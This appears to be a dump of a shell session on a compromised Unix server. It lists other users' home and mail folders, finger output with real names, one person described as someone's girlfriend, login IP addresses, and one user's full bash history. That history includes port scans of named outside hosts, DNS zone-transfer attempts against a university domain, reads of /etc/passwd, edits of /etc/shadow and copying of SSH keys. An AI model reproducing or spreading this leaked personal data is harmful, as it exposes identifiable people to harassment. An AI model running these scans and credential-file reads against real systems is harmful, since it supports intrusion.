496 Sep 30 2005 INBOX.Drafts -rw------- 1 effugas wheel 324536 Nov 18 2005 INBOX.Sent -rw------- 1 effugas wheel 496 Sep 30 2005 INBOX.Trash -rwx------ 1 effugas wheel 20767 Oct 24 2006 Juggler - Charisma Arts Bootcamp.avi.torrent -rw-r--r-- 1 effugas wheel 403486571 Jul 13 2006 Junk -rw-r--r-- 1 effugas wheel 379402660 Nov 17 2005 Junk_toobig -rw------- 1 effugas wheel 280301055 Aug 21 2006 Known drwxr-xr-x 2 effugas wheel 512 Sep 26 2005 MT-3.2-en_US -rwx------ 1 effugas wheel 1377924 Sep 26 2005 MT-3.2.tar.gz drwxrwxrwx 2 effugas jb 512 Sep 24 2005 Mail -rw-r--r-- 1 effugas wheel 1438 Oct 4 2006 
Makefile -rw------- 1 effugas wheel 229972323 Sep 21 2006 Older Mail -rw------- 1 effugas wheel 181797360 Jul 25 2005 Orig_Older -rw------- 1 effugas wheel 492 Jul 25 2005 Outbox -rw-r--r-- 1 effugas wheel 200578 Aug 12 2007 PhoneCrypt_docs_pc.pdf -rwx------ 1 effugas wheel 28554 Nov 18 2006 PickUp 101 - He Said, She Said - Volume 1.torrent drwxr-xr-x 2 effugas wheel 512 Oct 2 2005 PyFlickrUploadr -rw-r--r-- 1 effugas wheel 7164 Oct 2 2005 PyFlickrUploadr.tar.gz lrwxr-xr-x 1 effugas wheel 31 Jan 8 2006 RouteSec -> /usr/home/effugas/mail/RouteSec -rw-r--r-- 1 effugas wheel 1352443 Mar 1 2008 Secret of Mana.zip -rw------- 1 effugas wheel 144765683 Jul 26 2006 Sent -rw------- 1 effugas wheel 68609225 Jul 25 2005 Sent Items -rw-r--r-- 1 effugas wheel 0 Sep 25 2005 Spam -rw-r--r-- 1 effugas wheel 55823056 Aug 10 2006 Trash drwxr-xr-x 2 effugas wheel 512 Oct 28 2005 ack drwxr-xr-x 2 effugas wheel 1024 Aug 8 2007 airhook-2 -rw-r--r-- 1 effugas wheel 28282 Apr 14 2003 airhook-2.tar.gz drwxr-xr-x 2 effugas wheel 512 Sep 8 2008 ap drwxr-xr-x 2 effugas wheel 1536 Feb 21 2008 arse -rw-r--r-- 1 effugas wheel 614 Jan 19 2005 authorized_keys -rw-r--r-- 1 effugas wheel 8048 Jan 23 2006 av2.txt -rw-r--r-- 1 effugas wheel 2641 Oct 6 2006 back.pem drwxr-xr-x 2 effugas wheel 1024 Jul 25 2006 bin -rw-r--r-- 1 effugas wheel 1801 Feb 23 2008 boing_seq.txt -rwx------ 1 effugas wheel 214576 Jul 25 2006 bplex_0_dev-src.gz -rw-r--r-- 1 effugas wheel 1662 Sep 8 2008 browserRedirect?url=itms%3A%2F%2Fax.phobos.apple.com.edgesuite.net%2FWebObjects%2FMZStore.woa%2Fwa%2FviewGenre%3Fid%3D35 drwxr-xr-x 2 effugas wheel 512 Jun 11 2006 ca drwxr-xr-x 2 effugas wheel 512 Sep 24 2006 cl drwxr-xr-x 60 effugas wheel 4096 Jul 6 2008 content drwxrwxrwx 2 effugas wheel 512 Jul 8 2008 db -rw-r--r-- 1 effugas wheel 963360 Sep 26 2005 db.dump -rw------- 1 effugas wheel 2416 Apr 27 13:07 dead.letter -rw-r--r-- 1 effugas wheel 718 Feb 22 2008 del.txt -rw-r--r-- 1 effugas wheel 4196 Feb 23 2008 del_seq.txt 
-rw-r--r-- 1 effugas wheel 4188 Feb 23 2008 del_ts.txt -rw-r--r-- 1 effugas wheel 10980 Sep 19 2006 dell_ssl2.txt -rw------- 1 effugas wheel 815104 Feb 11 2008 dig.core drwxr-xr-x 2 effugas wheel 1024 Jul 30 2006 dissoc-0.1 -rw-r--r-- 1 effugas wheel 51652 Jul 2 2001 dissoc-0.1.tar.gz -rw-r--r-- 1 effugas wheel 193 Oct 4 2006 distinfo -rwx------ 1 effugas wheel 7211132 Mar 15 2008 dk2_cli.pcap drwxr-xr-x 33 effugas wheel 3584 Jul 13 11:47 dl -rw-r--r-- 1 effugas wheel 4338 Mar 30 2005 dns.cap -rw-r--r-- 1 effugas wheel 4338 Apr 13 15:23 dns.pcap -rwx------ 1 effugas wheel 3793316 Jun 15 2006 domain_login_esp.cap drwxr-xr-x 2 effugas wheel 512 Dec 23 2008 dprint -rw-r--r-- 1 effugas wheel 615112704 Nov 5 2006 en_winxp_pro_with_sp2.iso -rw-r--r-- 1 effugas wheel 1967 Feb 23 2008 fark_seq.txt -rw-r--r-- 1 effugas wheel 1984 Feb 23 2008 fark_ts.txt drwxr-xr-x 2 effugas wheel 512 Oct 4 2006 files -rw------- 1 effugas jb 209744 Sep 25 2005 filtered -rw------- 1 effugas wheel 37106364 Sep 26 2005 fire_inbox -rw-r--r-- 1 effugas wheel 7385211 Oct 28 2005 foo.pgp -rw-r--r-- 1 effugas wheel 10485784 Jun 19 2006 foo.xml -rw-r--r-- 1 effugas wheel 12920 Feb 22 2008 g_seq.txt -rw-r--r-- 1 effugas wheel 12848 Feb 22 2008 g_ts.txt -rw------- 1 effugas jb 2909341 Jan 12 2006 gah drwxr-xr-x 9 effugas wheel 1536 Aug 11 2005 gaim-1.5.0 -rw-r--r-- 1 effugas wheel 6123237 Aug 11 2005 gaim-1.5.0.tar.bz2 -rw------- 1 effugas wheel 7999488 Sep 29 2005 gaim.core -rw-r--r-- 1 effugas wheel 1588 Jan 1 2006 ghet_ip.c drwxrwxr-x 2 effugas wheel 512 Sep 30 2005 ghetto drwxr-xr-x 2 effugas wheel 512 Sep 25 2005 gml -rwxr-xr-x 1 effugas wheel 3395 Jun 17 2004 gml.py drwxr-xr-x 2 effugas wheel 512 Aug 23 2007 haxedit -rwx------ 1 effugas wheel 40960 Aug 27 2007 haxedit.tgz -rwxr-xr-x 1 effugas wheel 5312 Apr 6 14:20 heh -rw-r--r-- 1 effugas wheel 168 Apr 6 14:20 heh.cpp drwxr-xr-x 2 effugas wheel 512 Apr 26 00:32 hmm -rw-r--r-- 1 effugas wheel 1636602 Oct 28 2005 hmm.txt -rw-r--r-- 1 effugas wheel 
2200 Jan 21 2008 hoho.txt -rw-r--r-- 1 effugas wheel 15748938 Nov 24 2007 huh_shai.gz drwxr-xr-x 5 effugas wheel 512 Jan 24 2006 imgSeek-0.8.6 -rw-r--r-- 1 effugas wheel 396056 Nov 14 2006 imgSeek-0.8.6.tar.bz2 -rw-r--r-- 1 effugas wheel 618624 Aug 12 2007 imsi-capture_phonecrypt_secured.wav -rw-r--r-- 1 effugas wheel 74086 Jun 10 2006 index.php -rw-r--r-- 1 effugas wheel 36115 Oct 5 2006 index.txt -rwxr-xr-x 1 effugas wheel 2739 Nov 7 2005 info_bot.pl drwxr-xr-x 2 effugas wheel 133120 Dec 5 2006 is -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.1 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.2 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.3 -rw-r--r-- 1 effugas wheel 764567 Nov 26 2007 jm.zone drwxr-xr-x 2 effugas wheel 512 Oct 8 2007 johnny -rw-r--r-- 1 effugas wheel 0 Sep 8 2008 known_hosts drwxr-xr-x 2 effugas wheel 512 Mar 8 2005 lib drwxr-xr-x 7 effugas wheel 1024 Aug 29 2008 libspf2-1.2.5 -rw-r--r-- 1 effugas wheel 517945 Feb 23 2005 libspf2-1.2.5.tar.gz -rwx------ 1 effugas wheel 3548321 Jan 21 2008 local3.log -rw-r--r-- 1 effugas wheel 166676 Feb 22 2008 log.bin -rw-r--r-- 1 effugas wheel 22722620 Dec 8 2005 log.txt -rw-r--r-- 1 effugas wheel 10763 Mar 29 18:48 login drwxr-xr-x 3 effugas wheel 2048 Dec 5 2006 m -rw-r--r-- 1 effugas wheel 182 Feb 28 2006 mae.txt drwxr-xr-x 3 effugas wheel 512 Jul 17 11:39 mail drwxrwxrwx 2 effugas jb 512 Dec 31 2005 mail_oh -rw-r--r-- 1 effugas wheel 2765 Jun 1 2008 mangle.c -rw------- 1 effugas jb 7385213 Oct 28 2005 mater.pgp -rw-r--r-- 1 effugas wheel 66 Oct 28 2005 mater.pgp.2 -rwxr-xr-x 1 effugas wheel 4961 Apr 14 17:31 mem -rw-r--r-- 1 effugas wheel 231 Apr 14 17:31 mem.c -rw-r--r-- 1 effugas wheel 1002 Jul 6 2008 migrate.pl drwxr-xr-x 2 effugas wheel 512 Jan 5 2008 mov drwxr-xr-x 7 effugas wheel 512 Sep 29 2005 msn drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 msn-bot -rw-r--r-- 1 effugas wheel 16973 Jul 16 2003 msn-bot.zip drwxr-xr-x 2 effugas wheel 512 Jan 
13 2006 music drwxr-xr-x 4 effugas wheel 4163072 Feb 2 2007 mypix -rw-r--r-- 1 effugas wheel 7096 Feb 22 2008 mys.txt -rw-r--r-- 1 effugas wheel 11102 Feb 23 2008 mys_seq.txt -rw-r--r-- 1 effugas wheel 1032 Feb 23 2008 mys_ts.txt drwxr-xr-x 7 effugas wheel 1024 Feb 13 2007 netcat-0.7.1 -rwx------ 1 effugas wheel 398872 Feb 13 2007 netcat-0.7.1.tar.gz drwxr-xr-x 2 effugas wheel 512 Jun 5 2007 new -rw-r--r-- 1 effugas wheel 0 Jun 11 2006 newcert.pem -rw-r--r-- 1 effugas wheel 1180 Jun 11 2006 newreq.cer -rw-r--r-- 1 effugas wheel 1180 Jun 11 2006 newreq.pem -rwxr-xr-x 1 effugas wheel 10371 Nov 15 2006 nomde.pl drwxr-xr-x 5 effugas wheel 512 Sep 17 2004 ophcrack_1_0a -rw-r--r-- 1 effugas wheel 5114862 Sep 17 2004 ophcrack_1_0a.zip -rw-r--r-- 1 effugas wheel 139283 Jan 10 2006 out.txt -rw------- 1 effugas jb 138418 Sep 28 2005 penn -rw------- 1 root wheel 999878656 Nov 25 2008 perl5.8.8.core -rw------- 1 effugas wheel 91009024 Jan 26 17:29 pine.core drwxr-xr-x 3 effugas wheel 58368 Feb 2 2007 pix drwxr-xr-x 5 effugas wheel 512 Jan 26 2007 pix2 -rw-r--r-- 1 effugas wheel 554 Oct 4 2006 pkg-descr -rw-r--r-- 1 effugas wheel 853 Oct 4 2006 pkg-plist drwxr-xr-x 3 effugas wheel 512 Jun 5 2007 s4 -rw-r--r-- 1 effugas wheel 378156 Mar 14 2006 scapy.py drwxr-xr-x 8 effugas wheel 2560 Oct 8 2006 screen-4.0.2 -rw-r--r-- 1 effugas wheel 840519 Jan 27 2004 screen-4.0.2.tar.gz drwxr-xr-x 3 effugas wheel 512 Sep 27 2005 sdba -rwxr-xr-x 1 effugas wheel 486449 Jul 12 2006 sequitur_simple.exe drwxr-xr-x 2 effugas wheel 512 Feb 6 14:10 shmoo -rw-r--r-- 1 effugas wheel 387800 Feb 13 2007 socat-1.5.0.0.tar.gz -rw-r--r-- 1 effugas wheel 0 Dec 30 2005 spam_first drwxr-xr-x 2 effugas wheel 2560 Jul 25 2006 src -rw-r--r-- 1 effugas wheel 144 Sep 27 2005 subcheck.pl -rw-rw---- 1 effugas mail 148812841 Dec 30 2005 superchunk_1 -rw-rw---- 1 effugas mail 7489304 Dec 31 2005 superchunk_2 drwxr-xr-x 2 effugas wheel 512 Apr 20 19:32 swap -rw-r--r-- 1 effugas wheel 117 Jul 6 2008 tcheck.pl -rw-r--r-- 
1 effugas wheel 1025 Feb 22 2008 test.txt drwxr-xr-x 2 effugas wheel 512 Apr 3 15:48 tmp -rw-r--r-- 1 root wheel 221202 Nov 25 2008 tmp1 -rw-r--r-- 1 root wheel 225530 Nov 25 2008 tmp2 drwxr-xr-x 2 effugas wheel 512 Nov 11 2008 tor-audit drwxr-xr-x 5 effugas wheel 1536 Jun 23 2007 trunk -rwxr-xr-x 1 effugas wheel 7232 Feb 13 2007 udpfwd -rw-r--r-- 1 effugas wheel 3431 Feb 13 2007 udpfwd.c drwxr-xr-x 20 effugas wheel 1536 Jun 29 10:16 unbound-1.3.0 -rw-r--r-- 1 effugas wheel 4059848 Jun 11 04:00 unbound-latest.tar.gz -rw-r--r-- 1 effugas wheel 87 May 17 2007 url.txt drwxr-xr-x 2 effugas wheel 512 Sep 20 2005 walker-3.8 -rw-r--r-- 1 effugas wheel 18478 Sep 20 2005 walker-3.8.tar.gz -rwx------ 1 effugas wheel 24256 Jun 18 2006 webdav.txt -rwx------ 1 effugas wheel 21710 Jun 18 2006 webdav.xml drwxr-xr-x 2 effugas wheel 512 Nov 7 2005 wtf -rw-r--r-- 1 effugas wheel 92 May 30 2007 wtf.pl drwxr-xr-x 2 effugas wheel 1024 Jul 28 2006 xray -rw-r--r-- 1 effugas wheel 12840 Feb 23 2008 yahoo_seq.txt -rw-r--r-- 1 effugas wheel 13002 Feb 23 2008 yahoo_ts.txt %ls -la mail total 4656348 drwxr-xr-x 3 effugas wheel 512 Jul 17 11:39 . drwx------ 68 effugas wheel 5120 Jul 17 11:43 .. 
drwx------ 4 effugas wheel 512 Oct 27 2006 .imap -rw------- 1 effugas wheel 6 Oct 7 2006 .subscriptions -rw------- 1 effugas wheel 101091425 May 10 11:00 Funsec -rw------- 1 effugas wheel 3758946 Feb 23 11:13 RouteSec -rw------- 1 effugas wheel 1297160537 Jul 12 14:02 Spam -rw------- 1 effugas wheel 26177660 May 6 14:13 Subject: -rw------- 1 effugas wheel 325849488 Jul 26 2008 Trash -r-------- 1 effugas wheel 0 Nov 15 2006 _PyR,xy1WFB.pmjm.com -rw-r--r-- 1 effugas wheel 46592 Apr 18 2006 dan.doc -rw------- 1 effugas wheel 190010509 Apr 27 14:02 drone -rw------- 1 effugas jb 66078 Apr 18 2006 galley.txt -rw------- 1 effugas wheel 0 Jan 29 2006 mail-trash -rw------- 1 effugas wheel 1884 Dec 31 2005 other -rw------- 1 effugas wheel 12310586 Jul 17 11:39 sent-mail -rw------- 1 effugas wheel 0 Jan 8 2006 spam-mail -rw------- 1 effugas wheel 296699245 Apr 18 02:36 to_first -rw------- 1 effugas wheel 129442683 May 10 08:03 to_other -rw------- 1 effugas wheel 0 Jan 7 2006 virus-mail %ls -lah /var/mail/effugas -rw-rw---- 1 effugas mail 1.4G Jul 17 11:41 /var/mail/effugas %cd /home%ls -la jb total 744332 drwxr-xr-x 6 mooseaccess jb 512 Apr 6 2004 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. 
-rw------- 1 root jb 6109 Sep 29 2006 .bash_history -rw-r--r-- 1 mooseaccess jb 771 Sep 9 2004 .cshrc -rw-r--r-- 1 mooseaccess jb 255 Sep 9 2004 .login -rw-r--r-- 1 mooseaccess jb 165 Sep 9 2004 .login_conf -rw------- 1 mooseaccess jb 371 Sep 9 2004 .mail_aliases -rw-r--r-- 1 mooseaccess jb 331 Sep 9 2004 .mailrc drwxr-xr-x 8 mooseaccess jb 512 Apr 6 2004 .openwebmail -rw-r--r-- 1 mooseaccess jb 801 Sep 9 2004 .profile -rw------- 1 mooseaccess jb 276 Sep 9 2004 .rhosts -rw------- 1 root jb 1024 Sep 12 2004 .rnd -rw-r--r-- 1 mooseaccess jb 852 Sep 9 2004 .shrc drwx------ 2 root jb 512 Sep 10 2006 .ssh drwxr-xr-x 2 root jb 512 Nov 27 2004 airhook-2 -rw-r--r-- 1 root jb 28282 Nov 27 2004 airhook-2.tar.gz drwxr-xr-x 2 mooseaccess jb 512 Apr 6 2004 mail -rw------- 1 root jb 900104 Nov 18 2004 paketto-1.10.tar.gz -rw-r--r-- 1 root jb 365 Sep 12 2006 test-scan-ddi-for-quoting.gnmap -rw-r--r-- 1 root jb 390 Sep 12 2006 test-scan-ddi-for-quoting.nmap -rw-r--r-- 1 root jb 1023 Sep 12 2006 test-scan-ddi-for-quoting.xml -rw-r--r-- 1 jay jay 1412325 May 9 2005 vpnforjay.tar.gz -rw-r--r-- 1 root jb 378449920 Sep 6 2006 win2k.iso %finger jb Login: jb Name: Jay "Ask DanK" Beale Directory: /home/jb Shell: /sbin/nologin Last login Mon Jun 29 10:00 (PDT) on ttyp6 from cpe-72-225-172- No Mail. No Plan. %cat jb/.bash_history ls cd /tmp ls ls -al ls -al | grep jb cd exit ls cd / ls cd space ls cd iso/ ls pwd exit tcpdump dst host 66.92.163.118 tcpdump -n dst host 66.92.163.118 tcpdump -n dst host 66.92.163.118 tcpdump -n dst host 66.92.163.118 exit #nmap -P0 -sS -r --max_rtt_timeout 66.92.163.118 ping 66.92.163.118 ping 66.92.163.118 nmap -P0 -sS -r --max_rtt_timeout 110 --min_rtt_timeout 27 --initial_rtt_timeout 55 66.92.163.118 nmap -P0 -p1-65535 -r --max_rtt_timeout 110 --min_rtt_timeout 27 --initial_rtt_timeout 55 66.92.163.118 exit ls nmap -v nmap -V nmap -sS -oA -sV -P0 -p1-65535 -oA nmap-transfer.activision.com transfer.activision.com ls ls ls ls pwd ls cd .. 
ls cd /usr/local/ ls ls bin/ apt-get install scanrand cd /usr/ports/ ls find . -name "*scanrand*" -print find . -name "*paketto*" -print ls cd ls su - jay cp paketto-1.10.tar.gz ~jay/ su - jay vi /etc/passwd ls chown jay ~jay/paketto-1.10.tar.gz su - jay cd ~jay/paketto-1.10 make install dmesg | less pwd ls cd ls tail -f nmap-transfer.activision.com.gnmap tail -f nmap-transfer.activision.com.xml tail -f nmap-transfer.activision.com.xml ' ' ' mv nmap-3.75.tar.bz2 ~jay/ ; chown jay ~jay/nmap* su - nmap su - jay pwd cd ~jay cd nmap-3.75 ls make install ls su - jay nessusd ls nessusd ls cd ls nessusd traceroute transfer.activison.com iptables -A OUTPUT -j ACCEPT ls ping webtracker4.activision.com nmap -P0 -p1-65535 -sS -oA nmap-scan-webtracker4.txt webtracker4.activision.com nmap -P0 -sS -p 22,21,23 66.77.144.28 traceroute 66.77.144.28 nmap -P0 -sS -p 22,21,23 66.77.144.28 traceroute 66.77.144.28 tcptraceroute pwd cd /usr/ports/ find . -name "tcptrace*" -print cd net/tcptraceroute/ ls make install pwd cd tcptraceroute 66.77.144.28 tcptraceroute -p 1521 66.77.144.28 tcptraceroute -p 23 66.77.144.28 ls exit ls tail nmap-scan-webtracker4.txt. tail nmap-scan-webtracker4.txt.nmap tail nmap-scan-webtracker4.txt.xml cat nmap-scan-webtracker4.txt.xml tcpdump src host 66.77.144.43 nmap -P0 -sS -p80 webtracker4.activision.com nmap -P0 -sS -p443 webtracker4.activision.com nmap -P0 -sS -p1-65535 -oA 63.146.124.34-35-37 63.146.124.34 63.146.124.35 63.146.124.37 su - jay ls ls less 63.146.124.34-35-37.nmap bitchx Bitchx BitchX cd /usr/ports ls find . -name "irc*" -print cd irc ls sirc cd sirc make install screen su - jay screen -r screen -r screen -r screen -wipe screen -r ps -ef |grep screen screen -r screen -r screen -r man screen screen -d screen -r exit screen -r exit exit screen -a screen -r exit screen -r ls ps -ef | grep air grep air /etc/inetd.conf pwd cd make tar -xzvf airhook-2.tar.gz cd airhook-2 ls make echo $? 
ls less README vi Makefile make screen -r screen -r su - jay screen -d screen -r screen -r screeen -d screen -d screen -r su - jay su - jay su - jay exit screen -r screen useradd lance adduser lance su - lance userdel lance deluser lance vi /etc/passwd vi /etc/shadow vi /etc/shadow vi /etc/passwd su - lance su - jay ls exit screen screen -r screen -d screen -r rmuser lance exit dsirc sirc www2.linuxsecurity.org su - jay exit screen -r ps -ef |grep screen screen screen -r screen -d && screen -r screen -r screen -d screen -r screen -r pkg_info | grep nmap nmap clear i su - jay ls cat /etc/passwd su - jay ls ls -l /etc/passwd cat /etc/passwd ls ~effugas ls pwd ls -l cd .. ls ls -l last -1 nmap -P0 -O 216.220.209.238 exit last -1 last -1 effugas nmap -O 216.220.209.238 nmap -O -P0 216.220.209.238 screen screen -r screen -d screen -r exit last -1 jay last -1 jb last -1 -n jb last -1 -i jb man last last -1 jb nmap -O 24.19.11.162 | less nmap -P0 -O 24.19.11.162 | less nmap -P0 -O 24.19.11.162 | less nmap -P0 -p1-65535 -O 24.19.11.162 | less nmap -P0 -sS -p1-65535 -O 24.19.11.162 | less ls rm -fr 63.146.124.34-35-37.* ls rm -fr nmap-* ls cd ~jay ls pwd cat /etc/passwd passwd jay ls cd ~jay ls passwd jay ls ls rm -fr paketto-1.10 nmap-3.75 nmap-3.75.tar.bz2 paketto-1.10.tar.gz ls ls cd ~jay ls less goodluck\! rm goodluck\! 
mv vpnforjay.tar.gz ~jb/ cd passwd jay exit ls su - jay ls cat /etc/passwd su - effugas_nr cd ~effugas_nr/ ls ls BitTorrent-3.4.2 tar -cf - BitTorrent-3.4.2 | ( cd ~jay/ ; tar -xvf - ) cd ~jay lks ls chown -R jay BitTorrent-3.4.2/ ls -al chgrp jay BitTorrent-3.4.2/ chgrp -R jay BitTorrent-3.4.2/ su - jay cat /etc/passw cat /etc/passwd passwd jb passwd jay exit exit cat /etc/resolv.conf cat /etc/passwd su - jay su - jay su - jay ls su - jay exit ls cat /etc/passwd cd ~jay ls cd .ssh/ ls cat >known_hosts mv known_hosts authorized_hosts chown jay authorized_hosts ls ls -al chmod go-r authorized_hosts nmap nmap -sP 192.12.34.0/24 nmap -sS 192.12.34.0/24 nmap -P0 -sS 192.12.34.0/24 dig -x 192.12.34.1 dig -x 192.12.34.2 dig -x 192.12.34.3 dig -x 192.12.34.4 dig -x 192.12.34.5 dig -x 192.12.34.6 dig -x 192.12.34.7 dig -x 192.12.34.8 dig -x 192.12.34.9 ls screen -r exit exit clear dig @arizona.edu darthmouth.edu AXFR dig @ns1.dartmouth.edu darthmouth.edu AXFR dig @ns2.dartmouth.edu darthmouth.edu AXFR ifconfig clear last -i last jay last j last jb ssh root at 129.170.18.156 last jb ssh root at 129.170.18.156 ssh jay at 129.170.18.156 ssh jay at 129.170.18.156 exit cd ~jay ls cd .ssh/ ls cat authorized_keys* ~jb/.ssh/ cp authorized_keys* ~jb/.ssh/ man syslogd man syslogd exit exit ssh jay at 129.170.18.249 ssh jay at 129.170.18.156 #nmap -P0 -sS -p 1-65535 --max ping 70.250.13.88 ping 70.250.13.89 nmap -P0 -sS -p 1-65535 --initial_rtt_timeout=5 --min_rtt_timeout=5 --max_rtt_timeout=25 70.250.13.88 screen screen ssh jay at holly ssh jay at 129.170.18.156 exit ssh jay at 129.170.18.156 nmap -P0 -sS -p 1-65535 --initial_rtt_timeout=5 --min_rtt_timeout=5 --max_rtt_timeout=25 -oA test-scan-ddi-for-quoting 70.250.13.88 exit screen -r clear ssh jay at 129.170.18.156 ssh jay at 129.170.18.156 man pwcheck_pam ssh jay at 129.170.18.249 ssh jay at 129.170.18.156 ssh jay at 129.170.18.156 ssh jay at 129.170.18.249 su - jay exit cat /etc/hosts ssh jay at 129.170.18.249 exit ssh jay at 
24.18.17.11 ssh -p 49356 jay at 24.18.17.11 ssh -p 49356 jay at 24.19.18.11 ssh -p 49356 jay at 24.19.18.11 last -i last last | less ssh -p 49356 jay at 24.19.18.11 nc 24.19.18.11 49356 exit %ls -la psm total 236 drwxr-x--- 7 psm pmjm 1536 Jul 13 15:34 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw------- 1 psm pmjm 173 Jul 10 2008 .Xauthority.gz -rw-r--r-- 1 psm pmjm 0 Jul 3 2004 .addressbook -rw------- 1 psm pmjm 2285 Jul 11 2004 .addressbook.lu -rw-r--r-- 1 psm pmjm 24 Jul 3 2004 .bash_logout -rw-r--r-- 1 psm pmjm 191 Jul 3 2004 .bash_profile -rw-r--r-- 1 psm pmjm 124 Jul 3 2004 .bashrc -rw-r--r-- 1 psm pmjm 771 May 30 2004 .cshrc -rw------- 1 psm pmjm 169 Jun 20 15:03 .lesshst -rw-r--r-- 1 psm pmjm 760 Jul 3 2004 .login -rw-r--r-- 1 psm pmjm 165 May 30 2004 .login_conf -rw------- 1 psm pmjm 371 May 30 2004 .mail_aliases -rw-r--r-- 1 psm pmjm 331 May 30 2004 .mailrc -rw-r--r-- 1 psm pmjm 11 Jul 3 2004 .mh_profile -rw-r--r-- 1 psm pmjm 2 Mar 24 2006 .msgsrc drwxr-xr-x 2 psm pmjm 512 May 9 21:38 .ncftp drwx------ 8 psm pmjm 512 May 9 21:38 .openwebmail -rw------- 1 psm pmjm 10632 Jul 3 2004 .pine-debug1 -rw------- 1 psm pmjm 10768 Jul 3 2004 .pine-debug2 -rw------- 1 psm pmjm 11164 Jul 3 2004 .pine-debug3 -rw------- 1 psm pmjm 10790 Jul 3 2004 .pine-debug4 -rw------- 1 psm pmjm 17153 Oct 2 2008 .pinerc -rw-r--r-- 1 psm pmjm 277 Jul 24 2006 .procmailrc -rw-r--r-- 1 psm pmjm 801 May 30 2004 .profile -rw-r--r-- 1 psm pmjm 852 May 30 2004 .shrc drwx------ 2 psm support 512 Jul 1 16:48 .spamassassin drwx------ 2 psm pmjm 512 May 9 22:32 .ssh drwxr-xr-x 2 psm pmjm 512 May 9 21:39 .ssh2 -rw-r--r-- 1 psm pmjm 1457 Jan 24 2007 .tcshrc -rw------- 1 psm psm 198 Nov 13 2006 .vacation.msg %finger psm Login: psm Name: Paul S. Mauvais Directory: /home/psm Shell: /bin/tcsh Last login Mon Jul 13 13:35 (PDT) on ttyp4 from 128-107-239-233 No Mail. No Plan. %ls -la hampshir/ total 159852 drwxr-xr-x 7 hampshir hampshir 512 Sep 14 2007 . 
drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw-r--r-- 1 hampshir hampshir 24 Apr 2 2004 .bash_logout -rw-r--r-- 1 hampshir hampshir 191 Apr 2 2004 .bash_profile -rw-r--r-- 1 hampshir hampshir 124 Apr 2 2004 .bashrc -rw-r--r-- 1 hampshir hampshir 5531 Apr 2 2004 .canna -rw-r--r-- 1 hampshir hampshir 771 May 18 2005 .cshrc -rw-r--r-- 1 hampshir hampshir 847 Apr 2 2004 .emacs -rw-r--r-- 1 hampshir hampshir 120 Apr 2 2004 .gtkrc drwxr-xr-x 3 hampshir hampshir 512 Apr 2 2004 .kde -rw-r--r-- 1 hampshir hampshir 255 May 18 2005 .login -rw-r--r-- 1 hampshir hampshir 165 May 18 2005 .login_conf -rw------- 1 hampshir hampshir 371 May 18 2005 .mail_aliases -rw-r--r-- 1 hampshir hampshir 58 Apr 10 2004 .mailboxlist -rw-r--r-- 1 hampshir hampshir 331 May 18 2005 .mailrc drwx------ 7 hampshir mail 512 Apr 3 2004 .openwebmail -rw-r--r-- 1 root wheel 690 May 19 2005 .procmailrc -rw-r--r-- 1 hampshir hampshir 801 May 18 2005 .profile -rw------- 1 hampshir hampshir 276 May 18 2005 .rhosts -rw-r--r-- 1 hampshir hampshir 852 May 18 2005 .shrc drwx------ 2 hampshir hampshir 512 Oct 3 2006 .spamassassin -rw------- 1 hampshir hampshir 203 Apr 3 2004 .vacation.msg drwxr-xr-x 2 hampshir hampshir 512 Apr 2 2004 .xemacs -rw-r--r-- 1 hampshir hampshir 220 Apr 2 2004 .zshrc -rw------- 1 hampshir hampshir 81714487 Aug 2 2008 dead.letter drwxr-xr-x 2 hampshir wheel 512 May 9 14:35 mail %finger crystal Login: crystal Name: Crystal Williams (GF of DanK) Directory: /home/crystal Shell: /bin/sh On since Mon Jul 20 06:47 (PDT) on ttyp0, idle 1:53, from 76.14.85.220 No Mail. No Plan. %ls -la /home/crystal total 44 drwxr-xr-x 3 crystal crystal 512 Mar 21 09:33 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. 
-rw-r--r-- 1 crystal crystal 751 Mar 21 09:32 .cshrc -rw-r--r-- 1 crystal crystal 248 Mar 21 09:32 .login -rw-r--r-- 1 crystal crystal 158 Mar 21 09:32 .login_conf -rw------- 1 crystal crystal 373 Mar 21 09:32 .mail_aliases -rw-r--r-- 1 crystal crystal 331 Mar 21 09:32 .mailrc -rw-r--r-- 1 crystal crystal 766 Mar 21 09:32 .profile -rw------- 1 crystal crystal 276 Mar 21 09:32 .rhosts -rw-r--r-- 1 crystal crystal 975 Mar 21 09:32 .shrc drwx------ 2 crystal crystal 512 Mar 21 09:33 .ssh %cat crystal/.ssh/authorized_keys %ls -la / total 4009 drwxr-xr-x 22 root wheel 1024 May 5 20:47 . drwxr-xr-x 22 root wheel 1024 May 5 20:47 .. 
-rw-r--r-- 2 root wheel 786 Jul 22 2008 .cshrc -rw-r--r-- 2 root wheel 253 Jul 22 2008 .profile drwxrwxr-x 2 root operator 512 Sep 19 2006 .snap -r--r--r-- 1 root wheel 6188 Jul 22 2008 COPYRIGHT drwxr-xr-x 2 root wheel 1024 Jul 23 2008 bin drwxr-xr-x 8 root wheel 1024 Jul 28 2008 boot drwxr-xr-x 2 root wheel 512 Sep 19 2006 cdrom lrwxr-xr-x 1 root wheel 10 Sep 19 2006 compat -> usr/compat dr-xr-xr-x 4 root wheel 512 May 5 13:49 dev drwxr-xr-x 2 root wheel 512 Sep 19 2006 dist -rw------- 1 root wheel 4096 May 5 20:47 entropy drwxr-xr-x 20 root wheel 2560 Jul 13 14:24 etc lrwxr-xr-x 1 root wheel 16 Sep 26 2006 export -> /usr/pmjm/export -rw-r--r-- 1 root wheel 2648 Sep 20 2006 findit.pl lrwxrwxrwx 1 root wheel 8 Sep 19 2006 home -> usr/home drwxr-xr-x 9 root wheel 512 Jul 17 2008 include -rw------- 1 root wheel 11834 Jul 28 2008 ktrace.out drwxr-xr-x 3 root wheel 2048 Jul 22 2008 lib drwxr-xr-x 2 root wheel 512 Jul 22 2008 libexec drwxr-xr-x 2 root wheel 512 Jun 5 2007 media drwxr-xr-x 2 root wheel 512 Nov 3 2005 mnt dr-xr-xr-x 2 root wheel 512 Nov 3 2005 proc -rw-r--r-- 1 root wheel 3059 May 5 20:50 razor-agent.log drwxr-xr-x 2 root wheel 2560 Jul 22 2008 rescue -rw------- 1 root wheel 1949696 Jul 22 2008 